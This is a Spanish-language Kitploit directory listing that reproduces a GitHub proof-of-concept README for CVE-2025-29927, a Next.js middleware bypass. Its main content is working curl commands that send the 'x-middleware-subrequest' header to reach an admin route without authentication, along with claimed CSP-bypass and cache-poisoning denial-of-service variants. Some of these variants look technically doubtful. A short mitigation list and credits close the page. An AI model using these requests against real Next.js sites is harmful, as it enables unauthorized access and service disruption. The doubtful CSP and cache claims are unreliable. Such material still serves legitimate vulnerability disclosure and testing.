Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/eve-satoru/poc-cve-2025-29927
Autenticación y AutorizaciónAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebEvasión de WAFSeguridad Web
GitHubeve-satoru/poc-cve-2025-29927

POC-CVE-2025-29927

CVE-2025-29927 Prueba de concepto

Ver Repositorio
31hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-29927: PoC de Bypass de Middleware de Next.js

Descripción general

Este PoC demuestra CVE-2025-29927, una vulnerabilidad en el middleware de Next.js que permite a los atacantes eludir los mecanismos de autenticación, autorización y CSP mediante el encabezado x-middleware-subrequest.

Versiones afectadas

Versiones de Next.js 11.1.4 a 15.1.7

Configuración e instalación

1️⃣ Clona e instala el PoC

root@kitploit:~
git clone https://github.com/Eve-SatOrU/POC-CVE-2025-29927.git
cd POC-CVE-2025-29927
cd Demo 
cd my-next-app
npm install
npm run dev

La aplicación se iniciará en http://localhost:3000

Escenarios de explotación

1️⃣ Bypass de autenticación y autorización (cURL)

1- Usa la cabecera x-middleware-subrequest para obtener acceso no autorizado:

root@kitploit:~
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3000/admin

💥 Resultado esperado: La respuesta devuelve admin admin, aunque la autenticación fue eludida.

captura de pantalla del resultado

2️⃣ Bypass de CSP para inyección XSS

Si la CSP se aplica mediante el middleware, omítela:

root@kitploit:~
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" \
     -H "Content-Security-Policy: default-src 'self'" \
     http://localhost:3000/admin

💥 Resultado esperado: Se ignora la CSP, lo que permite la ejecución de scripts maliciosos.

3️⃣ Ataque DoS por envenenamiento de caché (CPDoS)

Explota el envenenamiento de caché forzando una respuesta malformada:

root@kitploit:~
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" \
     -H "Cache-Control: public, max-age=3600" \
     http://localhost:3000/admin

💥 Resultado esperado: La página se almacena en caché con contenido incorrecto, lo que afecta a los usuarios normales.

Estrategias de mitigación

  • ✅ Valida la lógica del middleware para prevenir el bypass.
  • ✅ Actualiza Next.js una vez que se publique una versión parcheada.

Créditos

🔍 Descubierto por: Allam Rachid (zhero;) y Allam Yasser (inzo_)

Descargar herramienta